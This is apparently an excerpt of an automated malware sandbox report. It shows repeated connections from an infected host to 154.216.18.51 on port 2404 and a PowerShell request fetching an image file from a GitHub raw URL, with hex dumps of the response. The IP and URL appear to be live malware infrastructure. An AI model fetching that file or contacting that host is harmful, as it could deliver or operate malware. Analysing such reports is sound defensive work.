Oct 24, 2024 08:47:04.252964020 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.252979994 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253082991 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.253091097 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253143072 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.253196955 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253211975 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253256083 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.253262997 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253277063 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253309011 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.253319025 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253331900 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253349066 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.253392935 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.253536940 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253551006 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253603935 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.253609896 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253664017 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.253664017 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.253802061 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253815889 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253892899 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.253899097 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.253952980 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.254354954 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.254385948 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.254426956 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.254434109 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.254467964 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.254489899 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.360558987 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.360599041 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.360637903 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.360650063 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.360686064 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.360728979 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.360788107 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.360802889 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.360848904 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.360855103 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.360928059 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.360951900 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.361140966 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.361155987 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.361213923 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.361222029 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.361296892 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.361479044 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.361493111 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.361550093 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.361557007 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.361610889 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.361697912 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.361751080 CEST	443	49701	185.199.108.133	192.168.2.7
Oct 24, 2024 08:47:04.361758947 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.361798048 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.362150908 CEST	49701	443	192.168.2.7	185.199.108.133
Oct 24, 2024 08:47:04.601689100 CEST	49712	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:04.607021093 CEST	2404	49712	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:04.607136011 CEST	49712	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:04.614727974 CEST	49712	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:04.620033026 CEST	2404	49712	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:13.088211060 CEST	2404	49712	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:13.088279009 CEST	49712	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:13.088373899 CEST	49712	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:13.093702078 CEST	2404	49712	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:14.101149082 CEST	49761	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:14.106599092 CEST	2404	49761	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:14.109663963 CEST	49761	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:14.135668993 CEST	49761	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:14.141031027 CEST	2404	49761	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:22.602260113 CEST	2404	49761	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:22.602330923 CEST	49761	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:22.602425098 CEST	49761	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:22.607687950 CEST	2404	49761	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:23.616539955 CEST	49810	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:23.622433901 CEST	2404	49810	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:23.622531891 CEST	49810	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:23.626384974 CEST	49810	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:23.632006884 CEST	2404	49810	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:32.217153072 CEST	2404	49810	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:32.217284918 CEST	49810	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:32.217339993 CEST	49810	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:32.223225117 CEST	2404	49810	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:33.225946903 CEST	49859	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:33.231414080 CEST	2404	49859	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:33.231539011 CEST	49859	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:33.235493898 CEST	49859	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:33.241017103 CEST	2404	49859	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:41.706044912 CEST	2404	49859	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:41.706177950 CEST	49859	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:41.706250906 CEST	49859	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:41.711568117 CEST	2404	49859	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:42.710146904 CEST	49905	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:42.715538979 CEST	2404	49905	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:42.715606928 CEST	49905	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:42.720045090 CEST	49905	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:42.725308895 CEST	2404	49905	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:51.205203056 CEST	2404	49905	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:51.205327988 CEST	49905	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:51.205569983 CEST	49905	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:51.210789919 CEST	2404	49905	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:52.210730076 CEST	49958	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:52.216521978 CEST	2404	49958	154.216.18.51	192.168.2.7
Oct 24, 2024 08:47:52.216650963 CEST	49958	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:52.220612049 CEST	49958	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:47:52.226113081 CEST	2404	49958	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:00.693723917 CEST	2404	49958	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:00.693845034 CEST	49958	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:00.714715004 CEST	49958	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:00.721270084 CEST	2404	49958	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:01.729289055 CEST	49977	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:01.734812975 CEST	2404	49977	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:01.734958887 CEST	49977	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:01.738936901 CEST	49977	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:01.745070934 CEST	2404	49977	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:10.218863010 CEST	2404	49977	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:10.219010115 CEST	49977	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:10.219202042 CEST	49977	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:10.224555969 CEST	2404	49977	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:11.226432085 CEST	49978	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:11.403736115 CEST	2404	49978	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:11.406486988 CEST	49978	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:11.410547018 CEST	49978	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:11.415978909 CEST	2404	49978	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:19.893599987 CEST	2404	49978	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:19.893680096 CEST	49978	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:19.893733025 CEST	49978	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:19.899081945 CEST	2404	49978	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:20.898013115 CEST	49979	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:20.904438972 CEST	2404	49979	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:20.904576063 CEST	49979	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:20.909918070 CEST	49979	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:20.915347099 CEST	2404	49979	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:29.661618948 CEST	2404	49979	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:29.661700964 CEST	49979	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:29.661868095 CEST	2404	49979	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:29.661910057 CEST	49979	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:29.664356947 CEST	49979	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:29.669838905 CEST	2404	49979	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:30.680171013 CEST	49980	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:30.686220884 CEST	2404	49980	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:30.686323881 CEST	49980	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:30.699448109 CEST	49980	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:30.704722881 CEST	2404	49980	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:39.444401979 CEST	2404	49980	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:39.444681883 CEST	49980	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:39.444794893 CEST	49980	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:39.445017099 CEST	2404	49980	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:39.445056915 CEST	49980	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:39.450068951 CEST	2404	49980	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:40.475378990 CEST	49981	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:40.481055021 CEST	2404	49981	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:40.481156111 CEST	49981	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:40.487257957 CEST	49981	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:40.492738008 CEST	2404	49981	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:48.963697910 CEST	2404	49981	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:48.963788033 CEST	49981	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:48.963821888 CEST	49981	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:48.969150066 CEST	2404	49981	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:49.976119995 CEST	49982	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:49.981987000 CEST	2404	49982	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:49.982075930 CEST	49982	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:49.985857010 CEST	49982	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:49.991811037 CEST	2404	49982	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:58.457576036 CEST	2404	49982	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:58.457695961 CEST	49982	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:58.457876921 CEST	49982	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:58.463351965 CEST	2404	49982	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:59.485735893 CEST	49983	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:59.491271019 CEST	2404	49983	154.216.18.51	192.168.2.7
Oct 24, 2024 08:48:59.491596937 CEST	49983	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:59.495748043 CEST	49983	2404	192.168.2.7	154.216.18.51
Oct 24, 2024 08:48:59.501209021 CEST	2404	49983	154.216.18.51	192.168.2.7

HTTP Request Dependency Graph

raw.githubusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	185.199.108.133	443	8	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 06:46:56 UTC	117	OUT	GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-10-24 06:46:57 UTC	889	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2578503 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: image/jpeg ETag: "ba4b733aa1ad403bc9cacb2a172994a886bea7b08e7a7dfb33ae1618861cbf3e" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: F760:27B52F:584797:61A26D:6719ED60 Accept-Ranges: bytes Date: Thu, 24 Oct 2024 06:46:57 GMT Via: 1.1 varnish X-Served-By: cache-dfw-kdal2120099-DFW X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1729752417.940714,VS0,VE342 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: cd20b1a9060ad0bb915ff0ace831bd167f162fc8 Expires: Thu, 24 Oct 2024 06:51:57 GMT Source-Age: 0
2024-10-24 06:46:57 UTC	16384	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 00 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 00 00 00 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 00 09 0a ff c4 00 5f 10 00 01 03 03 03 02 04 03 06 04 03 06 03 01 01 21 01 Data Ascii: JFIF,,ExifMM*CCp"_!
2024-10-24 06:46:57 UTC	16384	IN	Data Raw: c1 dc 0f e7 54 ac a7 04 aa 69 93 0d 3f c8 ef 4f ad ee 14 a4 41 54 fa 54 33 17 52 07 30 45 3a b7 b8 d8 48 93 3d e7 bd 54 9d 4c 96 32 c1 32 97 0a 76 9d c2 97 69 ed c9 24 1e 47 1f 5a 8a 45 cc ab 69 3e c0 f6 a5 db 7f 6f f5 4a 63 f5 a8 1c 19 2a 91 2a 9b 84 84 8f 9b 9e f1 e9 47 45 c4 a8 ca b8 f5 a8 d4 3a 95 81 07 bf 95 28 9b 9e 7e 6f c3 40 eb 13 91 22 ab 94 88 04 f6 ff 00 bf ca 8c 1f 49 50 83 51 ad dc c4 a8 11 1e 46 79 a3 0b a3 f8 89 24 9f 2a 1f 6d 8f bb 82 47 c4 e1 26 7b 8a 37 8d b8 f0 79 a8 c1 7c 79 98 03 b0 a1 6e f7 c3 59 25 44 f1 e9 4d ed 0d b8 93 37 02 48 04 11 41 f7 84 ef 1c 0a 8c 5d ee d3 09 30 26 8a e6 43 6f 3d 88 f4 34 5e d0 9c 91 2a 6e 40 02 48 04 fb d1 d1 76 15 b7 d3 91 de a1 55 7e 48 9f 33 e6 0f 7a f3 79 12 99 12 62 9d c1 f6 1f 71 3b f7 89 4f 04 49 Data Ascii: Ti?OATT3R0E:H=TL22vi$GZEi>oJc*GE:(~o@"IPQFy$mG&{7y\|ynY%DM7HA]0&Co=4^*n@HvU~H3zybq;OI
2024-10-24 06:46:57 UTC	16384	IN	Data Raw: ee 11 86 b3 f0 dd 64 da 9d ca 42 52 ea 8a 54 b0 82 b0 a0 14 95 19 94 d7 46 7c 58 2f 22 9f 84 ae a2 2f 12 19 5d c3 18 c4 5c 3a b7 4f fc 26 5b b8 69 6b 5a 7f e7 48 1b 87 b8 35 15 f6 73 fd e2 c7 e0 7f 08 ab 97 1a 52 6e f3 b9 35 b2 a4 24 a4 94 07 12 83 bf d4 85 25 40 1f 48 ae 66 fd 23 fa 95 51 b1 4d eb da 76 be e6 15 aa fe 24 32 5f 66 c7 56 ad f4 16 98 c7 e7 75 ed 86 ae bd b3 c8 2e d3 2b 6c e5 ad c6 18 b8 b7 1b 79 a4 6c 0a 0b 2e 27 c3 5a 16 14 a4 43 73 07 92 3b 8b 21 78 a1 70 e2 00 80 d9 29 22 79 11 c5 62 7f 10 5f 0c 2e 75 f7 aa 9a 1f 3f 75 ad b3 58 dc 36 8e ba 17 c7 0a c5 b3 2a 17 0f 21 40 a0 b6 f4 05 a5 2a 81 bd 2b 2a 4f f8 42 49 35 b1 37 75 e2 ac a9 64 ab 7a 8c c7 69 26 4d 6b 69 34 be da d9 8e 11 9b 76 a7 dc e4 59 ab b2 be d2 01 11 3e 94 bb 57 bb 14 90 ad Data Ascii: dBRTF\|X/"/]\:O&[ikZH5sRn5$%@Hf#QMv$2_fVu.+lyl.'ZCs;!xp)"yb_.u?uX6!@+*OBI57udzi&Mki4vY>W
2024-10-24 06:46:57 UTC	16384	IN	Data Raw: bc 9e 7d e9 74 c1 49 14 84 1d b4 c2 7f bd 28 d7 24 44 4c 52 68 32 83 f4 a3 36 7d e9 9a 09 0b 91 f2 f1 da 8f 33 20 0f 3a 49 0a dc 91 cc 45 1d be 41 f2 9a 01 b0 1c 18 13 e9 da 8e 15 22 28 80 42 23 be de 79 a3 02 26 09 32 69 0c 2c da b7 0a 13 02 4f 98 a4 90 36 40 99 e3 b5 19 d5 84 83 48 47 96 ad e4 89 ec 79 a4 dc ef c1 ef ef 42 55 03 bf 7a 4d 67 6c 9e d4 84 02 cf 3c f9 f1 44 24 a4 7d 3d e8 54 7e 69 9a 4d 4a 04 19 31 48 74 8f 28 6e 5f 97 6a 24 42 bf 2a 1d e0 1e f1 3e f4 02 24 f2 aa 41 20 5b e5 44 d1 f8 06 88 9f 94 c7 26 80 ac 7f d9 a2 51 7d c5 91 6d c9 83 cf f9 50 20 c2 07 03 f3 34 8a 94 22 09 fc a8 a5 d2 8e 0f 97 ef 44 36 e1 72 b9 48 1e 60 cd 11 63 9f f5 a4 f7 85 1f 31 f9 d0 82 37 0e 4c d3 8b 20 80 37 11 c4 11 5e d8 3d c5 00 e1 53 24 f1 da 8c 0f cb 48 24 11 Data Ascii: }tI($DLRh26}3 :IEA"(B#y&2i,O6@HGyBUzMgl<D$}=T~iMJ1Ht(n_j$B*>$A [D&Q}mP 4"D6rH`c17L 7^=S$H$
2024-10-24 06:46:57 UTC	16384	IN	Data Raw: d2 10 8a db f4 3d a9 25 27 6a a6 48 f6 a7 1c 05 77 06 91 75 3b a3 93 e5 48 42 31 22 81 07 f1 0f 43 42 55 dc 44 f9 c7 ad 02 88 0d c8 90 2a 4c 11 80 eb 7b 81 3e 83 b5 22 a0 76 81 cf 1d e9 c6 e1 bb b8 ed 49 38 21 5e c3 8a 42 11 52 41 9f 29 f3 f3 34 99 4c 27 76 e0 48 f3 f2 a5 ca 79 9a 4c a3 8d be b3 cd 21 09 28 6e 57 1e 7c 9e e6 69 25 ae 57 e4 4f a4 d2 b0 52 a2 7e 6f 9b f4 14 0b 6f 92 60 70 79 33 da 90 82 09 28 f4 93 1f 4a f2 9a 32 61 40 1a 10 41 44 09 f9 79 98 a5 54 92 a6 e7 ca 29 08 62 ea 08 31 34 92 d8 dc 48 9e d4 f5 68 ed 22 3f ce 92 2c 89 30 0c 11 eb 48 43 64 32 48 3f 31 83 43 e1 10 3f 11 3c 53 80 d9 6d 27 8e 05 79 40 2b ca 89 31 0c d6 df cb cf 73 48 5c 37 c0 83 4f cb 5b c7 00 09 f7 a4 2e 18 84 c0 1d 8d 3e 50 f8 22 56 d1 dc 60 c8 8a f3 4c 02 64 85 76 f5 Data Ascii: =%'jHwu;HB1"CBUD*L{>"vI8!^BRA)4L'vHyL!(nW\|i%WOR~oo`py3(J2a@ADyT)b14Hh"?,0HCd2H?1C?<Sm'y@+1sH\7O[.>P"V`Ldv
2024-10-24 06:46:57 UTC	16384	IN	Data Raw: 09 04 d1 25 90 1b 00 c0 ed da 2b c9 05 68 33 3c 79 7a d1 c3 20 1e 00 30 3d 68 c1 bd a0 f0 49 06 94 be 02 4c f3 69 10 27 c8 50 ab 94 24 f7 34 64 26 79 83 cf 14 45 c2 4f d7 de 98 76 37 75 25 43 82 45 35 bb 44 c0 fe a3 da 3b d3 a5 cc a8 08 14 d5 fe 55 10 47 1d e8 d9 18 c5 f4 14 a6 08 90 ae dc d2 7b 3b 19 2a f6 98 9a 70 f7 cd 3b a0 8f 38 a4 56 13 22 48 93 df eb 52 47 b0 84 97 dc 82 ae 0f 7f 6a 49 d1 fc ae 0c 1a 59 5d c8 ed 23 d6 93 71 09 2a e4 13 23 d6 8e 22 1b 38 de fe d1 f5 9a 6e e3 60 26 26 63 f6 a7 e5 b4 a4 a8 01 1e 46 93 76 d9 21 31 b7 f7 a2 23 79 6f 24 6b 9c 93 e7 e7 48 b8 9d a2 3b 03 df 9a 7e f5 a8 49 84 a4 c0 a4 97 6a 9d a4 11 c1 ed 4e 9e 05 f7 0c d5 29 57 92 53 eb 40 20 02 0f 98 9a 70 ed b4 08 e0 80 68 aa 68 48 e3 e5 07 81 45 90 e2 27 22 07 33 3e f4 Data Ascii: %+h3<yz 0=hILi'P$4d&yEOv7u%CE5D;UG{;p;8V"HRGjIY]#q#"8n`&&cFv!1#yo$kH;~IjN)WS@ phhHE'"3>
2024-10-24 06:46:57 UTC	16384	IN	Data Raw: a3 4d 85 13 cc 45 2c 86 52 85 70 7c ea 36 c4 79 bb 70 04 13 1c 52 a9 6a 10 93 c7 1f bd 0a 00 31 c9 fd 29 46 a3 64 f9 54 61 e0 f2 b8 04 82 04 0a 4d d4 6e 51 20 47 b1 a5 c0 0b 07 83 44 71 02 7b f2 07 34 cd 8b 08 8d 7d a5 02 7b 73 4c 9e 6a 67 cc 7e f5 2c fa 06 e8 91 f5 a6 8b b7 f1 56 66 67 ca 9b 70 db 48 d3 68 44 f6 83 45 56 3e 4c 83 cd 49 fd cc 15 00 27 8a 59 18 f9 24 73 07 8a 2d c2 da 41 a7 14 12 e2 41 04 fb 9a 5c e3 82 62 23 9f 4e d5 33 fc 34 40 20 50 a6 c3 78 ed 1c cd 33 98 db 59 18 cd 8e e1 4e 19 b2 22 78 04 45 3f fb 90 4f 60 7b d2 cd 5a 02 ae dd cd 0e 58 4a 24 72 2d 02 11 20 73 da 8c 6d c2 f8 02 a4 15 66 90 aa 20 b7 04 c0 1e f4 c3 8c 3e ea 3b 8e 49 e7 8a 6d 70 cc 48 00 99 a9 55 31 ea a9 1e 9d a9 05 b5 c1 11 c7 bd 21 10 b7 4c 14 fb 93 cc 47 14 c5 e4 19 Data Ascii: ME,Rp\|6ypRj1)FdTaMnQ GDq{4}{sLjg~,VfgpHhDEV>LI'Y$s-AA\b#N34@ Px3YN"xE?O`{ZXJ$r- smf >;ImpHU1!LG
2024-10-24 06:46:57 UTC	16384	IN	Data Raw: e7 ce 80 42 2e 18 27 b7 04 d2 3b 64 79 52 ae a3 e6 89 33 e9 eb 5e 2d ed 40 05 5c cc 52 ca 10 dc b5 e9 45 f0 38 1e 67 f3 a7 0a 41 50 e3 9f 3e 28 c8 67 cd 47 e5 fd 29 08 69 e0 93 fd 3c 1f 5a 2b d6 68 29 f9 84 93 cf 7a 7b e0 24 2b 92 01 ed cf 9d 03 8c 48 8a 7c 8d b4 89 7a cc 15 76 e6 22 85 ab 4e 76 80 0e ea 7e a6 21 66 38 81 e4 28 10 da 64 12 09 52 47 6a 7d c0 e1 89 b3 60 14 04 8f 7e f4 55 e3 e0 9e 09 9f 7a 78 d2 42 47 13 df cf eb 4e ad 2d c3 e7 92 3e 62 69 9b 1f 04 13 d6 45 21 3c 6e 23 b0 35 13 7d 66 77 13 b7 b1 9a b9 64 71 41 9d a6 49 e4 f9 fe 95 0f 79 66 99 50 8e fe f3 34 f1 9f 20 b4 55 de 6b 6b 9b 60 47 ac d3 4b 86 c8 90 90 09 35 37 75 60 12 e1 27 8f af 95 47 dc b0 36 aa 0c c7 9d 4f 16 0b 44 2d ca 76 28 81 cc 53 37 49 93 d8 d4 95 fb 61 05 46 62 45 30 78 Data Ascii: B.';dyR3^-@\RE8gAP>(gG)i<Z+h)z{$+H\|zv"Nv~!f8(dRGj}`~UzxBGN->biE!<n#5}fwdqAIyfP4 Ukk`GK57u`'G6OD-v(S7IaFbE0x
